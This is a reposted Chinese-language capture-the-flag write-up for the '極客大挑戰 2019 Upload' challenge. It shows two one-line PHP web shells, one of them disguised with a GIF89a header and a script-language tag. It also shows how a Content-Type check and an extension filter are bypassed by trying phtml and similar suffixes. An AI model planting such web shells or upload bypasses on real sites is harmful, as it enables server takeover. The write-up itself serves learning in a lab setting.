[極客大挑戰 2019]Upload


題目打開是一個文件上次功能點

 

首次常規操作二話不說先上傳一個一句話木馬。

<?php @eval($_POST['123'])?>

頁面提示被攔截,並顯示not image

 

那我們進行抓包修改Content-Type字段進行繞過

 

 

 

發現php后綴被攔截,所以我們用畸形的后綴在進行繞過。

phtml、pht、php、php3、php4、php5

發現phtml可以正常繞過

 

 

 

發現<?被檢測出來,進行攔截了,所以我們需要替換我們的一句話木馬。

GIF89a? <script language="php">eval($_REQUEST[123])</script>  #替換之后的木馬

然后就上次成功了

 

 

訪問upload目錄

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/

 

 

然后用菜刀、蟻劍鏈接,鏈接地址

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml

在根目錄下找到flag

 

 

                                                                                                                                                            

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM